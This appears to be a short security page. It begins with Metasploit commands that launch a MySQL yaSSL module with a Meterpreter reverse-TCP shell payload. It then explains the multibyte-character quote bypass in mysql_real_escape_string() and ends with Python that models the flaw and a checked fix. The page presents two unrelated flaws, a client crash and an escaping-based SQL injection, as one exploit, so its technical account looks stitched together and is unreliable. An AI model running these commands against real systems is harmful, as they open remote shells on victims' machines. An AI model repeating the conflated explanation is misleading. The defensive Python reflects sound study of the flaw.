use auxiliary/server/mysql/mysql_yassl_hello
set SRVHOST 0.0.0.0
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
If the client (mysql -h malicious_host -u root) crashes, it is vulnerable.
The exploit works by tricking mysql_real_escape_string() into treating a quote (') as part of a multi-byte character, so the quote is left unescaped. The attacker can then close the SQL query prematurely and inject their own commands.
The Attack Mechanism
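The byte-level effect described above can be reproduced in a small model. This is an added example, not code from the original page or from MySQL: escape_naive, has_live_quote and escape_checked are hypothetical helpers, GBK is an assumed connection character set, and the sample bytes are constructed.

```python
# Added example: a simplified model of the flaw, not libmysqlclient code.
# GBK is an assumed connection charset; all sample bytes are constructed.

SPECIAL = {0x22, 0x27, 0x5C}  # double quote, single quote, backslash


def is_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_trail(b: int) -> bool:
    return 0x40 <= b <= 0xFE and b != 0x7F


def escape_naive(data: bytes) -> bytes:
    """Flawed: a lead byte swallows the next byte without validating it."""
    out, i = bytearray(), 0
    while i < len(data):
        if is_lead(data[i]) and i + 1 < len(data):
            out += data[i:i + 2]  # next byte is skipped, even if it is a quote
            i += 2
            continue
        if data[i] in SPECIAL:
            out.append(0x5C)
        out.append(data[i])
        i += 1
    return bytes(out)


def has_live_quote(escaped: bytes) -> bool:
    """Scan like a GBK-aware parser; True if a quote would end the literal."""
    i = 0
    while i < len(escaped):
        b = escaped[i]
        if is_lead(b) and i + 1 < len(escaped) and is_trail(escaped[i + 1]):
            i += 2  # valid two-byte character
        elif b == 0x5C:
            i += 2  # backslash escapes the following byte
        elif b == 0x27:
            return True
        else:
            i += 1
    return False


def escape_checked(data: bytes) -> bytes:
    """Reject input that is not valid GBK, then escape per character."""
    text = data.decode("gbk")  # raises UnicodeDecodeError on invalid pairs
    table = {ord(c): "\\" + c for c in "\\'\""}
    return text.translate(table).encode("gbk")
```

has_live_quote can serve as a regression check on any escaping routine: it should return False for every escaped value before that value is placed inside a quoted literal.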